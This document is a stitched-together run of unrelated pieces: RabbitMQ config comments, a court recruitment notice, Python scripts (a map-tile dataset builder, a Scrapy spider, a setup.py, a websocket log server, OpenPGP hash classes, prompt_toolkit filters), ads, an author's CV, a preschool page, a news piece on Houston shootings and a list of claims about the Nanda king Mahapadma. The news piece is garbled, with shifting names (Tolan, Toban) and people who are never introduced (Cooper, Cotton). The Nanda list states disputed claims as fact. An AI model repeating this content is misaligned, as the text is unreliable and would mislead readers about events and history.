'^(?!amq\.).*' '{"ha- # mode": "all"}' " (boolean value) # Deprecated group/name - [DEFAULT]/rabbit_ha_queues #rabbit_ha_queues = false # Positive integer representing duration in seconds for queue TTL # (x-expires). Queues which are unused for the duration of the TTL are # automatically deleted. The parameter affects only reply and fanout # queues. (integer value) # Minimum value: 1 #rabbit_transient_queues_ttl = 1800 # Specifies the number of messages to prefetch. Setting to zero allows # unlimited messages. (integer value) #rabbit_qos_prefetch_count = 0 # Number of seconds after which the Rabbit broker is considered down # if heartbeat's keep-alive fails (0 disable the heartbeat). # EXPERIMENTAL (integer value) #heartbeat_timeout_threshold = 60 # How often times during the heartbeat_timeout_threshold we check the # heartbeat. (integer value) #heartbeat_rate = 2 # Deprecated, use rpc_backend=kombu+memory or rpc_backend=fake # (boolean value) # Deprecated group/name - [DEFAULT]/fake_rabbit #fake_rabbit = false # Maximum number of channels to allow (integer value) #channel_max = <None> # The maximum byte size for an AMQP frame (integer value) #frame_max = <None> # How often to send heartbeats for consumer's connections (integer # value) #heartbeat_interval = 1 # Enable SSL (boolean value) #ssl = <None> # Arguments passed to ssl.wrap_socket (dict value) #ssl_options = <None> # Set socket timeout in seconds for connection's socket (floating # point value) #socket_timeout = 0.25 # Set TCP_USER_TIMEOUT in seconds for connection's socket (floating # point value) #tcp_user_timeout = 0.25 # Set delay for reconnection to some host which has connection error # (floating point value) #host_connection_reconnect_delay = 0.25 # Maximum number of connections to keep queued. (integer value) #pool_max_size = 10 # Maximum number of connections to create above `pool_max_size`. # (integer value) #pool_max_overflow = 0 # Default number of seconds to wait for a connections to available # (integer value) #pool_timeout = 30 # Lifetime of a connection (since creation) in seconds or None for no # recycling. Expired connections are closed on acquire. (integer # value) #pool_recycle = 600 # Threshold at which inactive (since release) connections are # considered stale in seconds or None for no staleness. Stale # connections are closed on acquire. (integer value) #pool_stale = 60 # Persist notification messages. (boolean value) #notification_persistence = false # Exchange name for for sending notifications (string value) #default_notification_exchange = ${control_exchange}_notification # Max number of not acknowledged message which RabbitMQ can send to # notification listener. (integer value) #notification_listener_prefetch_count = 100 # Reconnecting retry count in case of connectivity problem during # sending notification, -1 means infinite retry. (integer value) #default_notification_retry_attempts = -1 # Reconnecting retry delay in case of connectivity problem during # sending notification message (floating point value) #notification_retry_delay = 0.25 # Time to live for rpc queues without consumers in seconds. (integer # value) #rpc_queue_expiration = 60 # Exchange name for sending RPC messages (string value) #default_rpc_exchange = ${control_exchange}_rpc # Exchange name for receiving RPC replies (string value) #rpc_reply_exchange = ${control_exchange}_rpc_reply # Max number of not acknowledged message which RabbitMQ can send to # rpc listener. (integer value) #rpc_listener_prefetch_count = 100 # Max number of not acknowledged message which RabbitMQ can send to # rpc reply listener. (integer value) #rpc_reply_listener_prefetch_count = 100 # Reconnecting retry count in case of connectivity problem during # sending reply. -1 means infinite retry during rpc_timeout (integer # value) #rpc_reply_retry_attempts = -1 # Reconnecting retry delay in case of connectivity problem during # sending reply. (floating point value) #rpc_reply_retry_delay = 0.25 # Reconnecting retry count in case of connectivity problem during # sending RPC message, -1 means infinite retry. If actual retry # attempts in not 0 the rpc request could be processed more then one # time (integer value) #default_rpc_retry_attempts = -1 # Reconnecting retry delay in case of connectivity problem during # sending RPC message (floating point value) #rpc_retry_delay = 0.25 [oslo_concurrency] lock_path = /var/lib/manila/tmp """
The Bombay High Court has released notification for the recruitment of the Stenographer (L.G.), Junior Clerk and Peon/Hamal. The applications are invited against 8921 vacancies. The Bombay High Court is located in Mumbai, Maharashtra and its jurisdiction covers Maharashtra, Goa, Dadra & Nager Haveli, Daman & Diu. Stenographer (L.G.) The applicant should have passed High School Examination. The preference will be given to the Graduate and Law Graduates from a recognised University. The applicant should have passed English typing Test min. 40 w.p.m, Marathi Typing Test min. 30 w.p.m, English Shorthand Speed of 100 w.p.m. and Marathi Shorthand Speed of 80 w.p.m. The applicant must have Computer Education Certificate from a recognised Institute/Center. The age of the applicant should be in between 18-38 years. The applicant belonging to the reserved categories shall be eligible for age relaxation. Junior Clerk The applicant should have passed High School Examination. The preference will be given to the Graduate and Law Graduates from a recognised University. The applicant should have passed English typing Test min. 40 w.p.m, Marathi Typing Test min. 30 w.p.m. Peon/Hamal The applicant should have passed the 7th class examination from a recognised Board. The applicant can fill the Application Form ‘free of cost’. There is no Application Fee to apply for the post of Stenographer (L.G.), Junior Clerk and Peon/Hamal.
# -*- coding: utf-8 -* import scipy.io from PIL import Image import numpy as np import random import scipy.ndimage from skimage.transform import rotate import os import argparse import requests from cStringIO import StringIO import glob import math import tensorflow as tf import json parser = argparse.ArgumentParser(description='MyScript') parser.add_argument('images_x_start', type=int) parser.add_argument('images_x_end', type=int) parser.add_argument('images_y_start', type=int) parser.add_argument('images_y_end', type=int) parser.add_argument('zoom_level', type=int) parser.add_argument('--inputJson', default="./jsonSample.txt") parser.add_argument('--outputPath', default="Data") args = parser.parse_args() TILE_SIZE = 256 #jsonFile = open(args.inputJson) #json_dict = json.load(jsonFile) with open(args.inputJson, 'r') as json_fp: json_dict = json.loads(json_fp.read(),'utf-8') print (str(json_dict)) INPUT_URL = json_dict['inputURL'] TARGET_URL = json_dict['targetURL'] OUTPUT_PATH = os.path.join(os.getcwd(),args.outputPath) if not os.path.isdir(OUTPUT_PATH): os.makedirs(OUTPUT_PATH) def _bytes_feature(value): return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value])) def _int64_feature(value): return tf.train.Feature(int64_list=tf.train.Int64List(value=[value])) #kernel_size = args.kernelSize kernel_size = 1 input_img_num = len(INPUT_URL) image_size_x = TILE_SIZE * ((args.images_x_end - int(kernel_size / 2) + kernel_size - 1) - (args.images_x_start - int(kernel_size / 2)) + 1) image_size_y = TILE_SIZE * ((args.images_y_end - int(kernel_size / 2) + kernel_size - 1) - (args.images_y_start - int(kernel_size / 2)) + 1) input_img = [] for i in range(input_img_num): input_img.append(Image.new('RGBA', (image_size_x, image_size_y), (0, 0, 0, 0))) target_img = Image.new('RGBA', (image_size_x, image_size_y), (0, 0, 0, 0)) #imgs_num = 1 def tile2latlon(x, y, z): lon = (x / 2.0**z) * 360 - 180 # 経度(東経) mapy = (y / 2.0**z) * 2 * math.pi - math.pi lat = 2 * math.atan(math.e ** (- mapy)) * 180 / math.pi - 90 # 緯度(北緯) return [lon,lat] def demtofloat(n): if n == 'e': return 0 else: return float(n) def getTile(req_target, i, j, zoom_level): input_img_p = Image.new('RGBA', (TILE_SIZE, TILE_SIZE), (0, 0, 0, 0)) error_flg = 0 if req_target['type'] == 'localTile': path_format = req_target['format'] path_format = path_format.replace('{z}', str(zoom_level)) path_format = path_format.replace('{x}', str(i)) path_format = path_format.replace('{y}', str(j)) input_image_path = os.path.join(req_target['path'], path_format) if os.path.isfile(input_image_path): input_img_p = Image.open(input_image_path) input_img_p = input_img_p.resize((TILE_SIZE, TILE_SIZE)) else: print("Can't get tile : %d - %d - %d" % (zoom_level, i, j)) error_flg = 1 return input_img_p, error_flg else: if req_target['type'] == 'tile': url_format = req_target['format'] url_format = url_format.replace('{z}', str(zoom_level)) url_format = url_format.replace('{x}', str(i)) url_format = url_format.replace('{y}', str(j)) input_image_url = req_target['url'] + url_format elif req_target['type'] == 'wms': start_point = tile2latlon(i, j, zoom_level) end_point = tile2latlon(i + 1, j + 1, zoom_level) url_format = req_target['format'] url_format = url_format.replace('{minx}', str(end_point[1])) url_format = url_format.replace('{miny}', str(start_point[0])) url_format = url_format.replace('{maxx}', str(start_point[1])) url_format = url_format.replace('{maxy}', str(end_point[0])) url_format = url_format.replace('{maxy}', str(end_point[0])) url_format = url_format.replace('{output_width}', str(TILE_SIZE)) url_format = url_format.replace('{output_height}', str(TILE_SIZE)) input_image_url = req_target['url'] + url_format print 'input : ' + input_image_url res = requests.get(input_image_url, verify=False) if res.status_code == 200: content_type = res.headers["content-type"] if 'image' not in content_type: print("Not image URL : %d - %d - %d" % (zoom_level, i, j)) error_flg = 1 return input_img_p, error_flg resfile = StringIO(res.content) input_img_p = Image.open(resfile) input_img_p = input_img_p.resize((TILE_SIZE, TILE_SIZE)) else: print("Can't get tile : %d - %d - %d" % (zoom_level, i, j)) error_flg = 1 return input_img_p, error_flg return input_img_p, error_flg def dataset_make(images_x_start, images_x_end, images_y_start, images_y_end, zoom_level, imgs_num): dataset_size_x = TILE_SIZE * (images_x_end - images_x_start + 1) dataset_size_y = TILE_SIZE * (images_y_end - images_y_start + 1) dataset_input_img = [] for i in range(input_img_num): dataset_input_img.append(Image.new('RGBA', (dataset_size_x, dataset_size_y), (0, 0, 0, 0))) dataset_target_img = Image.new('RGBA', (dataset_size_x, dataset_size_y), (0, 0, 0, 0)) error_flg = 0 for i in range(images_x_start, images_x_end + 1): for j in range(images_y_start, images_y_end + 1): if not TARGET_URL == None: input_img_p, error_flg = getTile(TARGET_URL, i, j, zoom_level) if error_flg == 1: print("Can't get tile : %d - %d - %d" % (zoom_level, i, j)) return dataset_input_img, dataset_target_img, error_flg else: dataset_target_img.paste(input_img_p, ((i - images_x_start) * TILE_SIZE, (j - images_y_start) * TILE_SIZE)) for k, req_target in enumerate(INPUT_URL): input_img_p, error_flg = getTile(req_target, i, j, zoom_level) if error_flg == 1: print("Can't get tile : %d - %d - %d" % (zoom_level, i, j)) return dataset_input_img, dataset_target_img, error_flg else: dataset_input_img[k].paste(input_img_p, ((i - images_x_start) * TILE_SIZE, (j - images_y_start) * TILE_SIZE)) print("Get tile : %d - %d - %d" % (zoom_level, i, j)) if error_flg == 0: input_chNum = 0 for tmpimg in dataset_input_img: input_chNum += np.asarray(tmpimg).shape[2] print ('input channel : ' + str(input_chNum)) print ('target channel : ' + str(np.asarray(dataset_target_img).shape[2])) input_img_np = np.zeros((dataset_size_y, dataset_size_x, input_chNum)) input_chNum = 0 for i, tmpimg in enumerate(dataset_input_img): tmpimg_np = np.asarray(tmpimg) for j in range(tmpimg_np.shape[2]): input_img_np[:, :, input_chNum] = tmpimg_np[:, :, j] input_chNum += 1 input_array_np = input_img_np/127.5 - 1.0 input_array_np_row = input_array_np.tostring() dataset_target_img_row = np.array(dataset_target_img).tostring() writer = tf.python_io.TFRecordWriter(os.path.join(OUTPUT_PATH, str(imgs_num) + '_' + str(images_x_start + int(kernel_size / 2)) + '_' + str(images_y_start + int(kernel_size / 2)) + '_' + str(zoom_level) + '.tfrecords')) example = tf.train.Example(features=tf.train.Features(feature={ 'height': _int64_feature(dataset_size_y), 'width': _int64_feature(dataset_size_x), 'input_ch': _int64_feature(input_array_np.shape[2]), 'target_ch': _int64_feature(np.array(dataset_target_img).shape[2]), 'input_raw': _bytes_feature(input_array_np_row), 'target_raw': _bytes_feature(dataset_target_img_row)})) writer.write(example.SerializeToString()) writer.close() return dataset_input_img, dataset_target_img, error_flg imgs_num = 1 for i in range(args.images_x_start, args.images_x_end + 1): for j in range(args.images_y_start, args.images_y_end + 1): print "----- input : " + str(imgs_num) + " : " + str(args.zoom_level) + "-" + str(i) + "-" + str(j) + " -----" input_img_p, target_img_p, error_flg = dataset_make(i - int(kernel_size / 2), i - int(kernel_size / 2) + kernel_size - 1, j - int(kernel_size / 2), j - int(kernel_size / 2) + kernel_size - 1, args.zoom_level, imgs_num) for k in range(input_img_num): input_img[k].paste(input_img_p[k], ((i - args.images_x_start) * TILE_SIZE, (j - args.images_y_start) * TILE_SIZE)) target_img.paste(target_img_p, ((i - args.images_x_start) * TILE_SIZE, (j - args.images_y_start) * TILE_SIZE)) if error_flg == 0: imgs_num += 1 for i in range(input_img_num): input_img[i].save("input_image%d.png" %(i)) target_img.save("target_image.png" ) print "Make Images : " + str(imgs_num - 1)
Diploma, Children Literature, 1985, workshop funded by the government of Kuwait, Nicosia - Cyprus. Diploma (Associate of Arts), Advertising Design, 1975, Beirut University College (currently Lebanese American University), Lebanon. Bachelor degree, Social Work, 1955, Beirut College for Women (currently Lebanese American University), Lebanon. Commissioned Writer (32 articles about international writers, artists, and musicians), 2001 - 2003, Al-Arabi Assaghir magazine (Kuwait). Commissioned Writer (26 stories for the television program "Tuti Kuty"), 1995, Tele Liban. Writer, Literary Consultant, and Critic, 1994 - 1996, Atfal magazine. Writer of Stories and Articles, 1994 - 1996, Hazar magazine. Member of the Union of Arab Writers, 1996 - present. Member of the Union of Lebanese Writers, 1996 - present. Active member of the International Board on Books for Young People (IBBY), Lebanese branch (LBBY), 1985 - present. Tabbara Hammoud, N. (2004). Whispers by an Oriental Woman [Novel for adults]. Beirut: Dar wa Maktabat al-Maaref. Tabbara Hammoud, N. (2001). The Third Face of Love [Novel for adults]. Beirut: Dar al-Farabi. Tabbara Hammoud, N. (1996). Suhd and Zilal [Novel for adults]. Beirut: Dar al-Jadid. Tabbara Hammoud, N. (1992). Spring Without Roses [collection of short stories for adults]. Beirut: Dar al-Turath al-Arabi. Author of the Reading Hymn, 2010. - Rooster of the Feast, presented at Gulbenkian Theater at the Lebanese American University, 1992. - The Phantom of the Forest, persented at different schools in Lebanon, 1993. Author of many novels for teenagers (9 to 14 years) and children stories (5 to 7 years and 4 to 6 years). Producing many paintings and displaying them in solo and group exhibits. Abdul Hamid Shuman Prize for Children Literature award for excellence in novel writing for youth and children, 2007. Best Production Award by the Union of Publishers, Beirut International Book Fair, 2005. Arab Child Story Prize, Abu Dhabi, 1999. Best Creation Award by the Union of Publishers, Beirut Book Fair, 1999. Listed on the IBBY Honour List for Excellence in Story Writing and speaker on behalf of 100 writers of children stories and artists listed on the honor's list, New Delhi IBBY conference, 1998.
# -*- coding: utf-8 -*- import scrapy import json from locations.items import GeojsonPointItem class TheBarreCodeSpider(scrapy.Spider): name = "thebarrecode" allowed_domains = ["thebarrecode.com"] start_urls = ( 'http://www.thebarrecode.com/', ) def parse(self, response): for location_url in response.xpath('//h4[@class="studio-location-name"]/a[1]/@href').extract(): yield scrapy.Request( location_url, callback=self.parse_location, ) def parse_location(self, response): properties = { 'addr_full': response.xpath('//h4[@class="studio-address"]/span[@class="street"]/text()').extract_first(), 'city': response.xpath('//h4[@class="studio-address"]/span[@class="city"]/text()').extract_first().replace(', ', ''), 'state': response.xpath('//h4[@class="studio-address"]/span[@class="state"]/text()').extract_first(), 'postcode': response.xpath('//h4[@class="studio-address"]/text()').extract_first(), 'phone': response.xpath('//h4[@class="studio-phone"]/text()').extract_first(), 'name': response.xpath('//h3[@class="studio-location-name"]/text()').extract_first(), 'ref': response.url, 'website': response.url, } for key in properties: if properties[key] and isinstance(properties[key], str): properties[key] = properties[key].strip() lat = response.xpath('//div[@class="marker"]/@data-lat').extract_first() if lat: lat = float(lat) properties['lat'] = lat lon = response.xpath('//div[@class="marker"]/@data-lng').extract_first() if lon: lon = float(lon) properties['lon'] = lon yield GeojsonPointItem(**properties)
Ergonomic design provides long time comfortable wearing and securely fit to your ears. This Moloke 56S earphones adopts Bluetooth 4.1 technology, allowing stable and wireless connectivity compatible with a range of Bluetooth-enabled devices such as phones, tablets and more. Ergonomic design provides long time comfortable wearing and securely fit to your ears. Suitable for various occasions especially for sports. Adopts Bluetooth 4.1 technology, makes sure faster-pairing speed and stable connectivity. Compatible with most Bluetooth-enabled devices. High definition microphone ensures stable and clear hands-free talking while keeping exercise or driving, safe and convenient. Soft ear hook design ensures your earphones hold firm as you sprint, jump, and flip through your workout. Built-in 70mAh battery ensures up to 6h listening music time when fully charged, great to meet your daily demands. Waterproof design, the earphones can be well protected from sweat, splash, rain. Adopting flexible silicone material, fit your ears, comfortable to wear. Perfect for sports occasions.
import codecs import os from setuptools import setup, find_packages import subprocess LOCAL_PATH = os.path.dirname(os.path.abspath(__file__)) def get_desc(): """Get long description by converting README file to reStructuredText.""" file_name = os.path.join(LOCAL_PATH, 'README.md') if not os.path.exists(file_name): return '' try: cmd = "pandoc --from=markdown --to=rst %s" % file_name stdout = subprocess.STDOUT output = subprocess.check_output(cmd, shell=True, stderr=stdout) return output.decode('utf-8') except subprocess.CalledProcessError: print('pandoc is required for package distribution but not installed') return codecs.open(file_name, mode='r', encoding='utf-8').read() def get_version(): with codecs.open(os.path.join(LOCAL_PATH, 'favesdump.py'), 'r') as f: for line in f: if line.startswith('__version__ ='): return line.split('=')[1].strip(' \'"') setup( name='favesdump', description='last.fm faves dumper.', version=get_version(), license='MIT', author='Alex Musayev', author_email='alex.musayev@gmail.com', url='https://github.com/dreikanter/favesdump', long_description=get_desc(), platforms=['any'], packages=find_packages(), install_requires=[ 'pyyaml', 'requests', ], entry_points={'console_scripts': ['favesdump = favesdump:main']}, zip_safe=True, classifiers=[ 'Development Status :: 4 - Beta', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', 'Topic :: System :: Archiving :: Backup', 'Topic :: Utilities', ], dependency_links=[], )
Wood windows offer style and energy efficiency to make your house feel like a home. There are countless options available when upgrading the windows in your home, but nothing compares to the warmth and beauty of traditional wood windows. At Tight Line Exteriors, we know that investing in new Atlanta wood windows is a big decision, and we’ll be with you every step of the way to ensure decades of home value and enjoyment. Free, in-home estimates with no hidden fees! For energy-efficient replacement windows in Atlanta, Alpharetta, Roswell, and beyond, there’s nobody more trusted than the pros at Tight Line Exteriors! To get more information on our selection of stunning wood windows, contact our team today. Just give us a call or fill out our online form, and we’ll help you get set up with a free, no-obligation estimate at a time that suits your busy schedule.
#! /usr/bin/env python3 # -*- coding: utf-8 -*- # import sys, string, os, time import asyncio import websockets import subprocess import socket FILE = "/tmp/app.log" def notify_launcher(str): # Create a socket (SOCK_STREAM means a TCP socket) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: # Connect to server and send data sock.connect(("localhost", 9000)) sock.sendall(bytes(str + "\n", "UTF-8")) except socket.error as msg: pass finally: sock.close() def htmlize(s): s = s.replace("&", "&amp;") s = s.replace("<", "&lt;") s = s.replace(">", "&gt;") s = s.replace("\n", "<br/>") return s @asyncio.coroutine def handler(websocket, path): with open(FILE, 'r') as fin: line = fin.readline() while(websocket.open): if line: yield from websocket.send(htmlize(line)) else: yield from asyncio.sleep(0.01) line = fin.readline() asyncio.get_event_loop().stop() if os.fork(): sys.exit(0) time.sleep(1) os.setsid() # request log file creation from launcher notify_launcher("logging-start") # this is the server process which reads the file, monitors # it for new contents and forwards it to the client loop = asyncio.get_event_loop() start_server = websockets.serve(handler, "", 8999) websocket_server = loop.run_until_complete(start_server) try: loop.run_forever() finally: websocket_server.close() loop.run_until_complete(websocket_server.wait_closed()) notify_launcher("logging-stop")
In the three-and-a-half months since Trayvon Martin was killed, Houston courts have heard two cases involving the shooting of unarmed civilians and decided them very differently. Last night, a Harris County jury found Raul Rodriguez guilty of murder for shooting his neighbor in 2010 over a noisy party. Kelly Danaher, a 36-year-old elementary school teacher, was having a birthday party for his wife and young daughter. Angry about the noise, Rodriguez armed himself with a handgun and video camera and recorded himself telling a police dispatcher, “my life is in danger now,” “these people are going to try and kill me,” and “I’m standing my ground here.” Rodriguez fatally shot Danaher in the street after someone tried to grab his video camera. Dateline Houston wishes this were a depressing postmodern play about the dangerous, aggrandizing fantasies engendered by constant self-documentation in the social media age—but it’s not. It’s a real news story about a retired firefighter with a concealed carry permit and the Stand Your Ground law that made him think that saying aloud that he believed his life was in danger would protect him from all consequences. The problem is, Rodriguez wasn’t a cop. In April, a federal judge dismissed a lawsuit against two Houston-area cops who shot an unarmed black man, Robbie Tolan, in his driveway in 2008. Here’s what happened—and please note, these events are not disputed; the issue at stake in the lawsuit was whether these events violated Tolan’s constitutional rights. Tolan and his cousin were driving home in the wee hours of December 31. Officer John C. Edwards (who is white) was on patrol in the Bellaire neighborhood and ran Cooper’s plates—you know, just because. The plates came back as stolen—because Edwards had entered the plate number wrong. Cotton was charged with first-degree aggravated assault by a public servant and found not guilty at trial in 2010. Naturally. Then the Toban family sued. They lost.
#!/usr/bin/env python3 import hashlib from .compat import OrderedDict, bytearray_or_str from .length import Length def decode_hash_algorithm(octet): if not isinstance(octet, int) or not 0 <= octet < 256: raise TypeError('Bad octet value: `{0}` of type `{1}`'.format( octet, type(octet))) try: return BYTE_TO_HASH[octet] except KeyError: raise ValueError( 'Unknown hash algorithm `{0}`. See ' 'http://tools.ietf.org/html/rfc4880#section-9.4'.format(octet)) class HashAlgorithm(): """ 9.4. Hash Algorithms http://tools.ietf.org/html/rfc4880#section-9.4 """ def __init__(self): raise RuntimeError('HashAlgorithm should not be instantiated') @classmethod def new(cls): return HashWrapper(cls.hash_constructor()) @classmethod def serialize(cls): return OrderedDict([ ('name', cls.__name__), ('octet_value', HASH_TO_BYTE[cls]), ('digest_length', cls.length), ]) class HashWrapper(): def __init__(self, hash_instance): self._h = hash_instance def update(self, data): return self._h.update(bytearray_or_str(data)) def digest(self): return bytearray(self._h.digest()) def hexdigest(self): return self._h.hexdigest() class MD5(HashAlgorithm): length = Length(bits=128) # 16 octets hash_constructor = hashlib.md5 class SHA1(HashAlgorithm): length = Length(bits=160) # 20 octets hash_constructor = hashlib.sha1 class RIPEMD160(HashAlgorithm): length = Length(bits=160) # 20 octets @staticmethod def hash_constructor(): return hashlib.new('ripemd160') class SHA256(HashAlgorithm): length = Length(bits=256) # 32 octets hash_constructor = hashlib.sha256 class SHA384(HashAlgorithm): length = Length(bits=384) # 48 octets hash_constructor = hashlib.sha384 class SHA512(HashAlgorithm): length = Length(bits=512) # 64 octets hash_constructor = hashlib.sha512 class SHA224(HashAlgorithm): length = Length(bits=224) # 28 octets hash_constructor = hashlib.sha224 BYTE_TO_HASH = { 1: MD5, 2: SHA1, 3: RIPEMD160, 8: SHA256, 9: SHA384, 10: SHA512, 11: SHA224, } HASH_TO_BYTE = dict( [(v, k) for k, v in BYTE_TO_HASH.items()] )
Welcome to Little Spuds Preschool! Shelby Hansen is a wife and mother to two precious kids who are full of life and lots of energy. She has been teaching preschool since the 2012 school year. She is teaching certified and has a Bachelor of Arts in Elementary Education from Brigham Young University. Mallory Soren has bachelors of science in Early Childhood Special Education. She worked as a special needs preschool teacher for 5 years. She has a passion for working with young children. She is a wife and mother to two young boys. She loves to spend time hiking and camping with her family. Sallee Hansen is a wife and mother of 3 kids. Sallee is from Mesa, AZ. Her family moved to Idaho in 2014 and took over ownership of the preschool in 2016. She helps in class when needed and substitutes when a teacher is out. Fill out this form and we will contact you later!
""" Filters that accept a `CommandLineInterface` as argument. """ from __future__ import unicode_literals from .base import Filter from prompt_toolkit.enums import EditingMode from prompt_toolkit.key_binding.vi_state import InputMode as ViInputMode from prompt_toolkit.cache import memoized __all__ = ( 'HasArg', 'HasCompletions', 'HasFocus', 'InFocusStack', 'HasSearch', 'HasSelection', 'HasValidationError', 'IsAborting', 'IsDone', 'IsMultiline', 'IsReadOnly', 'IsReturning', 'RendererHeightIsKnown', 'InEditingMode', # Vi modes. 'ViMode', 'ViNavigationMode', 'ViInsertMode', 'ViInsertMultipleMode', 'ViReplaceMode', 'ViSelectionMode', 'ViWaitingForTextObjectMode', 'ViDigraphMode', # Emacs modes. 'EmacsMode', 'EmacsInsertMode', 'EmacsSelectionMode', ) @memoized() class HasFocus(Filter): """ Enable when this buffer has the focus. """ def __init__(self, buffer_name): self._buffer_name = buffer_name @property def buffer_name(self): " The given buffer name. (Read-only) " return self._buffer_name def __call__(self, cli): return cli.current_buffer_name == self.buffer_name def __repr__(self): return 'HasFocus(%r)' % self.buffer_name @memoized() class InFocusStack(Filter): """ Enable when this buffer appears on the focus stack. """ def __init__(self, buffer_name): self._buffer_name = buffer_name @property def buffer_name(self): " The given buffer name. (Read-only) " return self._buffer_name def __call__(self, cli): return self.buffer_name in cli.buffers.focus_stack def __repr__(self): return 'InFocusStack(%r)' % self.buffer_name @memoized() class HasSelection(Filter): """ Enable when the current buffer has a selection. """ def __call__(self, cli): return bool(cli.current_buffer.selection_state) def __repr__(self): return 'HasSelection()' @memoized() class HasCompletions(Filter): """ Enable when the current buffer has completions. """ def __call__(self, cli): return cli.current_buffer.complete_state is not None def __repr__(self): return 'HasCompletions()' @memoized() class IsMultiline(Filter): """ Enable in multiline mode. """ def __call__(self, cli): return cli.current_buffer.is_multiline() def __repr__(self): return 'IsMultiline()' @memoized() class IsReadOnly(Filter): """ True when the current buffer is read only. """ def __call__(self, cli): return cli.current_buffer.read_only() def __repr__(self): return 'IsReadOnly()' @memoized() class HasValidationError(Filter): """ Current buffer has validation error. """ def __call__(self, cli): return cli.current_buffer.validation_error is not None def __repr__(self): return 'HasValidationError()' @memoized() class HasArg(Filter): """ Enable when the input processor has an 'arg'. """ def __call__(self, cli): return cli.input_processor.arg is not None def __repr__(self): return 'HasArg()' @memoized() class HasSearch(Filter): """ Incremental search is active. """ def __call__(self, cli): return cli.is_searching def __repr__(self): return 'HasSearch()' @memoized() class IsReturning(Filter): """ When a return value has been set. """ def __call__(self, cli): return cli.is_returning def __repr__(self): return 'IsReturning()' @memoized() class IsAborting(Filter): """ True when aborting. (E.g. Control-C pressed.) """ def __call__(self, cli): return cli.is_aborting def __repr__(self): return 'IsAborting()' @memoized() class IsExiting(Filter): """ True when exiting. (E.g. Control-D pressed.) """ def __call__(self, cli): return cli.is_exiting def __repr__(self): return 'IsExiting()' @memoized() class IsDone(Filter): """ True when the CLI is returning, aborting or exiting. """ def __call__(self, cli): return cli.is_done def __repr__(self): return 'IsDone()' @memoized() class RendererHeightIsKnown(Filter): """ Only True when the renderer knows it's real height. (On VT100 terminals, we have to wait for a CPR response, before we can be sure of the available height between the cursor position and the bottom of the terminal. And usually it's nicer to wait with drawing bottom toolbars until we receive the height, in order to avoid flickering -- first drawing somewhere in the middle, and then again at the bottom.) """ def __call__(self, cli): return cli.renderer.height_is_known def __repr__(self): return 'RendererHeightIsKnown()' @memoized() class InEditingMode(Filter): """ Check whether a given editing mode is active. (Vi or Emacs.) """ def __init__(self, editing_mode): self._editing_mode = editing_mode @property def editing_mode(self): " The given editing mode. (Read-only) " return self._editing_mode def __call__(self, cli): return cli.editing_mode == self.editing_mode def __repr__(self): return 'InEditingMode(%r)' % (self.editing_mode, ) @memoized() class ViMode(Filter): def __call__(self, cli): return cli.editing_mode == EditingMode.VI def __repr__(self): return 'ViMode()' @memoized() class ViNavigationMode(Filter): """ Active when the set for Vi navigation key bindings are active. """ def __call__(self, cli): if (cli.editing_mode != EditingMode.VI or cli.vi_state.operator_func or cli.vi_state.waiting_for_digraph or cli.current_buffer.selection_state): return False return (cli.vi_state.input_mode == ViInputMode.NAVIGATION or cli.current_buffer.read_only()) def __repr__(self): return 'ViNavigationMode()' @memoized() class ViInsertMode(Filter): def __call__(self, cli): if (cli.editing_mode != EditingMode.VI or cli.vi_state.operator_func or cli.vi_state.waiting_for_digraph or cli.current_buffer.selection_state or cli.current_buffer.read_only()): return False return cli.vi_state.input_mode == ViInputMode.INSERT def __repr__(self): return 'ViInputMode()' @memoized() class ViInsertMultipleMode(Filter): def __call__(self, cli): if (cli.editing_mode != EditingMode.VI or cli.vi_state.operator_func or cli.vi_state.waiting_for_digraph or cli.current_buffer.selection_state or cli.current_buffer.read_only()): return False return cli.vi_state.input_mode == ViInputMode.INSERT_MULTIPLE def __repr__(self): return 'ViInsertMultipleMode()' @memoized() class ViReplaceMode(Filter): def __call__(self, cli): if (cli.editing_mode != EditingMode.VI or cli.vi_state.operator_func or cli.vi_state.waiting_for_digraph or cli.current_buffer.selection_state or cli.current_buffer.read_only()): return False return cli.vi_state.input_mode == ViInputMode.REPLACE def __repr__(self): return 'ViReplaceMode()' @memoized() class ViSelectionMode(Filter): def __call__(self, cli): if cli.editing_mode != EditingMode.VI: return False return bool(cli.current_buffer.selection_state) def __repr__(self): return 'ViSelectionMode()' @memoized() class ViWaitingForTextObjectMode(Filter): def __call__(self, cli): if cli.editing_mode != EditingMode.VI: return False return cli.vi_state.operator_func is not None def __repr__(self): return 'ViWaitingForTextObjectMode()' @memoized() class ViDigraphMode(Filter): def __call__(self, cli): if cli.editing_mode != EditingMode.VI: return False return cli.vi_state.waiting_for_digraph def __repr__(self): return 'ViDigraphMode()' @memoized() class EmacsMode(Filter): " When the Emacs bindings are active. " def __call__(self, cli): return cli.editing_mode == EditingMode.EMACS def __repr__(self): return 'EmacsMode()' @memoized() class EmacsInsertMode(Filter): def __call__(self, cli): if (cli.editing_mode != EditingMode.EMACS or cli.current_buffer.selection_state or cli.current_buffer.read_only()): return False return True def __repr__(self): return 'EmacsInsertMode()' @memoized() class EmacsSelectionMode(Filter): def __call__(self, cli): return (cli.editing_mode == EditingMode.EMACS and cli.current_buffer.selection_state) def __repr__(self): return 'EmacsSelectionMode()'
1. Mahapadma Nanda (450–362 BCE) was the first king of the Nanda dynasty. 2. He was the son of Mahanandin, a Yadav king of the Shishunaga dynasty. 3. Sons of Mahanandin from his other wives opposed the rise of Mahapadma Nanda, on which he eliminated all of them to claim the throne. 4. The Nandas, under Mahapadma Nanda, established the first great North Indian empire with its political centre in Magadha, which would in the following years lead to the largest empire in ancient India, to be built by the Mauryas. 5. Mahapadma Nanda vanquished the old dynasties of North, not as was customary, to extract tribute from them and to be recognized as the most powerful, the samrat or the chakravartin, but rather in order to dethrone them and declare himself as an "ekachhatra", the only emperor in the entire land. 6. The collapse of the old Kshatriya dynasties under the rigorous power politics of Mahapadma Nanda made him to be called as "The Destroyer of Kshatriyas". 7. He died at 88 years old. 8. His kingdom annexed parts of Kalinga, central India, Anga, and the upper Ganges Valley.
